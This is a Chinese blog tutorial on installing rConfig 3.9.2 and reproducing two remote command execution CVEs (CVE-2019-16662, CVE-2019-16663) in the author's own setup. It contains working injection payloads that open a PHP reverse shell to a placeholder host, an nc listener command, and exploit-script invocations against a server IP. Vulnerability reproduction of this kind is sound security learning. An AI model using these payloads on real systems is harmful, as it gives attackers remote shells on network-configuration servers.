您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關如何進行rConfig-CVE漏洞復現及環境搭建,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
rConfig是一個開放源代碼的網絡設備配置管理實用程序,網絡工程師可以使用它來頻繁獲取其網絡設備的配置快照。rConfig是唯一的,因為您選擇要針對設備運行的命令。
只需使用要應用于設備類別的命令列表配置rConfig,然后將設備添加到該類別。創建一個計劃任務,其余工作由rConfig完成。現在,rConfig版本3具有配置符合性管理實用程序,使您可以監視設備配置以符合策略。
一、環境搭建
rConfig安裝
cd /home
curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
chmod +x install_rConfig.sh
./install_rConfig.sh
運行文件安裝發現報錯 我們打開源碼看看為什么連接不上
結果發現會curl訪問一下谷歌來判斷是否有網 我們可以直接改成www.baidu.com,但是后面安裝可能會剛問一寫被墻的連接,所以我們保險起見,掛個代理把!!!我這里用的是proxychains4代理的我內網的一個ss。
然后就可以直接正常安裝了。
安裝完成之后會有一個centos7_postReboot.sh文件
我們接著運行一下 就可以看見已經安裝完成了。剩下就去web頁面配置了。
進入https://192.168.157.130/install頁面進行后續安裝
到此安裝均已完成,默認賬號密碼為admin admin。
二、漏洞復現
rConfig 3.9.2及更低版本中的未經身份驗證的命令執行漏洞。安裝后,安裝目錄不會自動刪除,這允許未經身份驗證的用戶通過ajaxServerSettingsChk.php文件作為Web服務器用戶執行任意命令。
CVE-2019-16662 rConfig3.9.2遠程命令執行漏洞復現:
為了直觀,我自己在服務器上搭建了一個rConfig3.9.2系統,現在我們來抓包復現一下漏洞
我們將路徑替換成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=
下面我們需要將命令執行一道url編碼 然后再填入參數即可。
已經輸出了我們的回顯,現在我們來彈個shell試一下
將url編碼;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#
另一個外網服務器進行監聽 nc -lvnp 6633
添加參數發送請求,可以看到已經反彈到shell了。
CVE-2019-16662Exp腳本利用
python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634
CVE-2019-16663 rConfig3.9.2遠程命令執行漏洞復現
這個RCE需要身份驗證才能執行,存在lib/crud/search.crud.php這個文件里。
登錄成功之后進行抓包 替換成RCE的路徑 將反彈shell的payload進行編碼
""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#
監聽,反彈,成功
CVE-2019-16663 EXP利用
python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636
CVE-2019-19509 rConfig3.9.3遠程命令執行漏洞
由于3.9.3的安裝包被官方刪除和下架了,現在無法復現,但網上已有Exp。
看完上述內容,你們對如何進行rConfig-CVE漏洞復現及環境搭建有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。